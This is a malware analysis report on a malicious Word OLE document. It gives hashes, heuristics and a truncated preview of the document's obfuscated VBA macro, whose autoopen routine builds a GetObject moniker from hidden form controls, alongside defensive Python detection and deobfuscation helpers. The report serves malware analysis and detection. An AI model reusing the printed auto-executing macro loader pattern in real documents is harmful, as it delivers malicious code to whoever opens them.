Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84dabb37496af03e…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 160.5 KB
Created: 2019-04-01 12:59:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 393b9a7d76b22c768f0aa5fad6d69414
SHA-1: ceafb04c1a2f6771c8c9994d40837a02c178bd67
SHA-256: 84dabb37496af03ead61a973bc1a7231570256ac035eeb840cf37bf01d86d34c
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The recovered VBA project, together with a legacy WordBasic auto-exec marker, drives the verdict. Execution starts in Sub autoopen, which calls a single function (sGwQA11). Under On Error Resume Next that function builds a moniker string from UserForm control properties (PAGDDA.qwA_BAD.Text, z_CCAA.vx4D_D1, PAGDDA.qwA_BAD), passes it to GetObject, and then sets a ShowWindow property on the returned object. Everything else in the module is filler: write-only variables assigned CStr/CDate/ChrW/Rnd arithmetic over undeclared names, plus an opaque predicate (If 955461 = 955461 Then) around the live statements. Because the control text lives in the form streams rather than in the extracted code modules, the actual moniker and target cannot be read from this dump; a ShowWindow property is what a WMI Win32_ProcessStartup object exposes, which would fit a winmgmts moniker, but that is an inference from the property name, not an observation. The ClamAV signature (Doc.Malware.Sagent-6931221-0) and the p-code auto-exec heuristic corroborate the static picture. Taken together this is the classic macro-loader pattern that fetches and runs a second stage, but the download/execute step itself is not visible in the truncated preview and should be confirmed from the form-control strings or in a sandbox.

Heuristics (7)

  • ClamAV: Doc.Malware.Sagent-6931221-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6931221-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    Sub autoopen() runs automatically when the document is opened (VBA procedure names are case-insensitive, so autoopen and AutoOpen are the same entry point). It is the only entry point needed for the call chain in the extracted source.
  • GetObject call high OLE_VBA_GETOBJ
    GetObject() resolves a moniker string to a COM or WMI object, a common way to reach winmgmts: or a scripting host without calling CreateObject. Here the moniker is concatenated at runtime from UserForm control properties, so no literal target appears in the source.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The canned description for this heuristic covers the case where no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample a VBA project was in fact recovered and extracted (see OLE_VBA_MACROS and macros.bas below), so treat the marker as corroboration of the AutoOpen finding rather than independent evidence. It is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace string found in any document with drawing content; it is not a contact point and carries no weight in the verdict.
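The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above describes a token co-occurrence check rather than a parse of the macro: an auto-execution name and an execution primitive both appearing in the compiled stream. The Python below is an added example of that logic, written for this report; it is not the platform's implementation and not oletools code. It assumes you already hold the bytes of a compiled VBA stream (the p-code portion of a VBA/<module> stream or a __SRP_* cache, which olevba can expose), and the two streams it scans are constructed stand-ins, not bytes from this sample. Identifier names in compiled streams occur as 8-bit or UTF-16LE text, so both encodings are searched.

```python
"""Token co-occurrence check behind OLE_VBA_PCODE_AUTOEXEC_EXEC (added example).

Not the analysis platform's own implementation and not oletools code. Assumes the
caller already has the bytes of a compiled VBA stream; MALICIOUS_STREAM and
BENIGN_STREAM below are constructed stand-ins, not data from this sample.
"""
from typing import Dict, List, Tuple

AUTO_EXEC_TOKENS = ("autoopen", "auto_open", "document_open", "autoexec",
                    "autoclose", "auto_close", "document_close",
                    "workbook_open", "autonew")
# Shell / download / object-instantiation names. ShowWindow is included because
# it is the Win32_ProcessStartup property written by this sample's macro.
EXEC_TOKENS = ("shell", "wscript.shell", "getobject", "createobject", "winmgmts",
               "urldownloadtofile", "xmlhttp", "adodb.stream", "powershell",
               "cmd.exe", "showwindow")


def find_tokens(data: bytes, tokens) -> List[Tuple[str, str, int]]:
    """Case-insensitive search for each token in 8-bit and UTF-16LE form.

    bytes.lower() only maps ASCII A-Z, so UTF-16LE ASCII text lowercases cleanly
    and the interleaved NUL bytes are untouched. Returns (token, encoding, offset).
    """
    hay = data.lower()
    hits = []
    for tok in tokens:
        for enc, needle in (("ascii", tok.encode("ascii")),
                            ("utf-16le", tok.encode("utf-16-le"))):
            pos = hay.find(needle)
            while pos != -1:
                hits.append((tok, enc, pos))
                pos = hay.find(needle, pos + 1)
    return hits


def pcode_autoexec_verdict(stream: bytes) -> Dict[str, object]:
    """Fire only when an auto-exec token and an execution token co-occur.

    That conjunction is what separates 'has a macro' from 'runs something on
    open' when no decompressed source is available to read.
    """
    auto = find_tokens(stream, AUTO_EXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    return {"auto_exec": auto, "exec": execs, "fires": bool(auto and execs)}


# Constructed stand-in for a stripped-source module stream: filler bytes around
# UTF-16LE "autoopen", 8-bit "GetObject" and UTF-16LE "ShowWindow".
MALICIOUS_STREAM = (b"\x01\x16\x03\x00" + b"\x00" * 12
                    + "autoopen".encode("utf-16-le") + b"\x00\x00\x7f\x01"
                    + b"GetObject" + b"\x00" * 6
                    + "ShowWindow".encode("utf-16-le") + b"\xff\xff")

# Constructed benign counterpart: an open handler with no execution primitive.
BENIGN_STREAM = (b"\x00" * 8 + "Document_Open".encode("utf-16-le")
                 + b"\x00\x00" + b"MsgBox" + b"\x00" * 4 + b"ThisDocument")

if __name__ == "__main__":
    for label, stream in (("constructed malicious", MALICIOUS_STREAM),
                          ("constructed benign", BENIGN_STREAM)):
        v = pcode_autoexec_verdict(stream)
        print(label, "fires" if v["fires"] else "clean",
              sorted({h[0] for h in v["auto_exec"]}),
              sorted({h[0] for h in v["exec"]}))
```

Because it is a substring test, a benign document whose author named a procedure AutoOpen and legitimately calls Shell fires too; that is why the heuristic is scored high but reported alongside the extracted source and the signature hit rather than on its own.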

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   23118 bytes
SHA-256: b485b62e125dc8c7418581ec5c45b136e8aeb956ab3940b9d9fc92fd492eca34

Preview: first 1,000 lines of the extracted script (macros.bas); the listing below is cut off where the report truncates it.
Attribute VB_Name = "lABAAxk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PAGDDA"
Attribute VB_Base = "0{501D72E0-95CA-4E24-9F06-6E7AA1A2041D}{CE30A4C5-87F4-4E91-9CB3-E136520C2A27}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "z_CCAA"
Attribute VB_Base = "0{3E184899-ED40-48D8-A179-9C0C95E63BBE}{7364B5A7-4DE9-445E-BC3B-D259B9480943}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zU1okUA"
Function JAAAUA()
   OkUBAQ _
= CStr(pUAU_X + 116707867 + 516065813 _
* CDate(DQAUcxA * ChrW(325014452 / CDate(iAZQAZ)))) _
+ Rnd(h1BBQA + (340789119 + 260335350) * _
CDate(AxDAGAQ_ * CVar(535798935 / CDate(TCDCA_))))
   zDDBADA _
= CStr(sA_ABQQ + 259317512 + 41403532 _
* CDate(mAAADA_ * ChrW(339408510 / CDate(JAAAXGUA)))) _
+ Rnd(I__BQAc + (338407806 + 134658921) * _
CDate(LZUAGA * CVar(764702621 / CDate(jUCUGA1B))))
   EZkQxQx _
= CStr(iUCAcZAG + 88966497 + 394178343 _
* CDate(KX4D_AAc * ChrW(637698855 / CDate(zQCA41)))) _
+ Rnd(BD4XZAXZ + (217727560 + 557925586) * _
CDate(iZDoAQ * CVar(684440462 / CDate(mwwADC))))
End Function
Function CUXAAA4c()
   pCAUwBcA _
= CStr(uDDA_A + 759973452 + 527470049 _
* CDate(UBxAA_XA * ChrW(574272963 / CDate(VDxADA)))) _
+ Rnd(fZABAoQ + (235023204 + 219588339) * _
CDate(lAAAZw * CVar(956599172 / CDate(nAGBUxZ))))
   K_GAo1Z _
= CStr(jUwAAAA + 570031726 + 69580249 _
* CDate(QA4CxAZ * ChrW(366545827 / CDate(MQ1wDoQ)))) _
+ Rnd(JwoAADw + (243815178 + 201875902) * _
CDate(KAZDXA * CVar(857256187 / CDate(IAkDAU))))
End Function
Sub autoopen()
sGwQA11
End Sub
Function sGwQA11()
On Error Resume Next
   C_DQAcG _
= CStr(c_CGXQ + 62742426 + 644734202 _
* CDate(bQCQ4QA * ChrW(277261086 / CDate(cAGAwx_)))) _
+ Rnd(BoAQ1QDQ + (474445185 + 916564153) * _
CDate(aAAwck * CVar(701059557 / CDate(FUBCG1Ak))))
   lQGkwQC4 _
= CStr(A1CAAD + 672567468 + 933822670 _
* CDate(lAZk11A1 * ChrW(614379727 / CDate(LkxDXAwA)))) _
+ Rnd(uoZDwA4o + (152625577 + 351980225) * _
CDate(BAAxQAAA * CVar(672616682 / CDate(BQXABA))))
   CxBBAwZ _
= CStr(ncCQAx + 153316099 + 30882516 _
* CDate(HDAACB * ChrW(387328764 / CDate(rCGAA1B_)))) _
+ Rnd(ZQZQA4 + (903739644 + 341684145) * _
CDate(Z1AAwAQ * CVar(406558833 / CDate(wQUBAAkA))))
Set ZBwCQAG = GetObject(PAGDDA.qwA_BAD.Text + z_CCAA.vx4D_D1 + PAGDDA.qwA_BAD)
   FAA_A4 _
= CStr(K1BZBD + 551131358 + 729163559 _
* CDate(UZQkAQAQ * ChrW(518000452 / CDate(WDQwQA_x)))) _
+ Rnd(aAwUAA + (228056675 + 423826524) * _
CDate(bcBAGAc1 * CVar(849857878 / CDate(EcwQXA1))))
   cUCxQUB1 _
= CStr(t_ZUAxUA + 892327107 + 450913011 _
* CDate(VDxDDooA * ChrW(162958052 / CDate(XDA1_AQ)))) _
+ Rnd(kQoAoQ_ + (157030188 + 894840054) * _
CDate(aAAAocAA * CVar(976825957 / CDate(jDBA4A))))
If 955461 = 955461 Then
   p1xcAAA _
= CStr(LcADDxG + 748825824 + 406957944 _
* CDate(YA_AAk * ChrW(536428696 / CDate(DQwAkDQU)))) _
+ Rnd(TUUAAU4X + (287851315 + 696061703) * _
CDate(ikoAAB1A * CVar(695712248 / CDate(cAGQcw))))
   qcAAoD_ _
= CStr(aQAAwAAA + 427624474 + 106388616 _
* CDate(qDAXUAA * ChrW(904082946 / CDate(YBBAAQ)))) _
+ Rnd(KBAUGAB + (812205452 + 471441303) * _
CDate(Zo_CAc4X * CVar(624268896 / CDate(OkwDABDX))))
   FCBAC_oZ _
= CStr(bAc_B4DZ + 331041224 + 589511286 _
* CDate(nCA1_AX * ChrW(310676114 / CDate(KGQAwCA)))) _
+ Rnd(LAUUBA + (483694242 + 552368124) * _
CDate(IwAXAX * CVar(647290823 / CDate(AAAQkcA))))
ZBwCQAG. _
ShOwWiNdOw = PAGDDA.b_BAAUU + PAGDDA.b_BAAUU + PAGDDA.b_BAAUU
   ixAUCA_ _
= CStr(ZwXAkDAB + 683533666 + 648843714 _
* CDate(N
... (truncated)
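Reading 23 KB of the filler above by hand is wasteful; the live statements are the few whose results are used. The Python below is an added triage helper written for this report, not part of the analysis platform and not oletools code. It assumes the VBA source has already been recovered as text (which is what olevba did to produce macros.bas). It folds line continuations, splits procedures, drops write-only arithmetic assignments and tautological If blocks, finds the auto-exec entry point and what it calls, and lists the cross-module member references (here UserForm controls) that the GetObject moniker is built from. SAMPLE is constructed from lines in the preview; the closing End If and End Function are supplied because the preview is truncated.

```python
"""Triage pass over an obfuscated VBA dump like the macros.bas listing above.

Added example for this report, not the analysis platform's or oletools' code.
It assumes the VBA source was already recovered as text (olevba does this).
SAMPLE is constructed from preview lines; the closing 'End If' and
'End Function' are supplied here because the preview is truncated."""
import re
from collections import Counter

AUTO_EXEC = {"autoopen", "auto_open", "document_open", "autoexec", "autoclose",
             "auto_close", "document_close", "workbook_open", "autonew"}
SUSPICIOUS_CALLS = {"getobject", "createobject", "shell", "callbyname"}
PROC_RE = re.compile(r"^(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)\s*\(", re.I)
END_RE = re.compile(r"^End\s+(?:Sub|Function)\b", re.I)
ASSIGN_RE = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$")
IDENT_RE = re.compile(r"[A-Za-z_]\w*")
TAUT_IF_RE = re.compile(r"^If\s+(\d+)\s*=\s*(\d+)\s+Then\s*$", re.I)
MEMBER_RE = re.compile(r"\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)")

SAMPLE = '''Sub autoopen()
sGwQA11
End Sub
Function sGwQA11()
On Error Resume Next
   C_DQAcG _
= CStr(c_CGXQ + 62742426 + 644734202 _
* CDate(bQCQ4QA * ChrW(277261086 / CDate(cAGAwx_)))) _
+ Rnd(BoAQ1QDQ + (474445185 + 916564153) * _
CDate(aAAwck * CVar(701059557 / CDate(FUBCG1Ak))))
Set ZBwCQAG = GetObject(PAGDDA.qwA_BAD.Text + z_CCAA.vx4D_D1 + PAGDDA.qwA_BAD)
If 955461 = 955461 Then
ZBwCQAG. _
ShOwWiNdOw = PAGDDA.b_BAAUU + PAGDDA.b_BAAUU + PAGDDA.b_BAAUU
End If
End Function
'''


def join_continuations(src):
    """Fold ' _' continuations; 'obj. _' + 'Prop = ...' becomes 'obj.Prop = ...'."""
    out, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line.endswith(" _"):
            buf += line[:-1]
            continue
        out.append(re.sub(r"\.\s+", ".", buf + line).strip())
        buf = ""
    return [s for s in out if s]


def split_procedures(lines):
    """Map procedure name -> list of body statements."""
    procs, cur = {}, None
    for line in lines:
        m = PROC_RE.match(line)
        if m:
            cur = m.group(1)
            procs[cur] = []
        elif END_RE.match(line):
            cur = None
        elif cur is not None:
            procs[cur].append(line)
    return procs


def is_noise(stmt, occurrences):
    """Write-only assignment with no string literal, member access or suspicious
    call on the right: every 'x = CStr(... CDate(...)) + Rnd(...)' line in the dump."""
    m = ASSIGN_RE.match(stmt)
    if not m or occurrences[m.group(1).lower()] != 1:
        return False
    rhs = m.group(2)
    if '"' in rhs or "." in rhs:
        return False
    return not any(i.lower() in SUSPICIOUS_CALLS for i in IDENT_RE.findall(rhs))


def triage(src):
    lines = join_continuations(src)
    procs = split_procedures(lines)
    occurrences = Counter(i.lower() for l in lines for i in IDENT_RE.findall(l))
    cleaned, noise, opaque = {}, 0, 0
    for name, body in procs.items():
        kept, if_stack = [], []
        for stmt in body:
            if is_noise(stmt, occurrences):
                noise += 1
            elif re.match(r"^If\b.*\bThen\s*$", stmt, re.I):            # block If
                t = TAUT_IF_RE.match(stmt)                              # If 955461 = 955461 Then
                if_stack.append(bool(t) and t.group(1) == t.group(2))
                opaque += if_stack[-1]
                if not if_stack[-1]:
                    kept.append(stmt)
            elif not (re.match(r"^End\s+If\b", stmt, re.I) and if_stack and if_stack.pop()):
                kept.append(stmt)                         # End If of a tautology is dropped
        cleaned[name] = kept
    by_lower = {p.lower(): p for p in procs}
    entries = [p for p in procs if p.lower() in AUTO_EXEC]
    # A bare identifier statement in an entry point is a call into the real code.
    callees = {e: [by_lower[s.lower()] for s in cleaned[e] if s.lower() in by_lower] for e in entries}
    suspicious = [(p, s) for p, body in cleaned.items() for s in body
                  if any(i.lower() in SUSPICIOUS_CALLS for i in IDENT_RE.findall(s))]
    # Member references whose root was not created with Set: UserForm controls whose
    # text lives in the form streams, so the GetObject moniker is not in this dump.
    set_vars = {m.group(1).lower() for m in map(re.compile(r"^Set\s+(\w+)", re.I).match, lines) if m}
    controls = sorted({f"{a}.{b}" for body in cleaned.values() for s in body
                       for a, b in MEMBER_RE.findall(s) if a.lower() not in set_vars})
    return {"entry_points": entries, "callees": callees, "noise_statements": noise,
            "opaque_predicates": opaque, "suspicious": suspicious,
            "form_controls": controls, "cleaned": cleaned}
```

Run against the full macros.bas the output is the same shape: one entry point, one callee, a handful of kept statements, and the three form controls (PAGDDA.qwA_BAD, z_CCAA.vx4D_D1, PAGDDA.b_BAAUU) whose Text and default properties have to be pulled from the form streams to recover what GetObject is actually asked for. The write-only test is deliberately conservative (any reuse of the variable, a string literal or a member access keeps the statement), so it errs toward showing too much rather than hiding a real assignment.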